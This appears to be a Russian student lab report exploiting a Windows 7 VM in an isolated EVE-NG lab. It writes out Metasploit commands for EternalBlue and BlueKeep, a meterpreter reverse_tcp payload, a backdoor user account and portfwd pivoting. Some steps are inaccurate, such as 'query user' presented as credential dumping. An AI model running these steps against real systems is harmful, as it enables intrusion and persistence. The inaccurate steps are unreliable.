<h1>Практическая работа №3. Эксплутация уязвимостей. MetaSplot Framework</h1>
# Задание к практической работе №3
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)
- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
- Используя payload meterpreter:
- выполнить создание нового пользователя
- Выполнить скриншот рабочего стола
- получить все учетные записи, находящиеся в памяти системы
- Выполнить проксирование трафика во внутреннюю инфраструктуру
<h2>Выполнение заданий</h2>
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать):

- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
Kali-2021:
Для просмотра сетевых настроек вводим команду `ip a`:

Как видим, мы уже получили ip адрес на этой машине
Debian:
Точно также вводим `ip a`:
Видим, что в этом случае мы не получили ip автоматически

Запрашиваем ip адрес от DHCP сервера (используя команду `dhclient`):

Windows 7:
Аналогом `ip a` в windows системах служит команда `ipconfig`

Windows 10:

- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
Добавляем форвардинг портов через Web интерфейс pfsence:

- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
С помощью утилиты `nmap` сканируем порты на pfsence:

- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
Для начала перейдём в консоль Metasploit Framework с помощью команды `sudo msfconsole`
Ищем подходящие эксплойты командой `search ms17-010`

Воспользуемся эксплойтом eternalblue, для этого вводим команду `use 0`
Далее посмотрим параметры для этого эксплойта, используя команду `show options`:

Далее запустим эксплойт с помощью следующих команд
```
set forceexploit true
set rhost 192.168.149.141
run
```
Видим, что данный эксплоит отработал

- Используя payload meterpreter:
- выполнить создание нового пользователя
Проделаем следующие команды:
```
set rhost 192.168.149.141
set target 8
shell
```
Эксплойт выполнился, а теперь создадим нового пользователя на window машине:
``net user task eve@123 /add``
В панели управления видим нового пользователя:

- Выполнить скриншот рабочего стола
В meterpreter вводим команду screenshare и получаем скриншот рабочего стола:

- Получить все учетные записи, находящиеся в памяти системы
Получить все учётные записи в памяти состемы можно также через shell, поэтому повторим предыдущие действия, добавив к ним команду `set payload windows/x64/meterpreter/reverse_tcp`, указав `shell` в meterpreter и введя команду ``query user``:

- Выполнить проксирование трафика во внутреннюю инфраструктуру
Выполняем следующие команды в msfconsole:
```
search bluekeep
use 1
set payload windows/x64/meterpreter/reverse_tcp
set forceexploit true
set target 8
set rhost 192.168.149.141
run
```

Запускаем эксплойт командой `run`:

Вводим команду: ``portfwd add -L 192.168.149.131 -l 1234 -p 443 -r 192.168.1.1``

Проверяем указанный в команде адрес на kali машине:
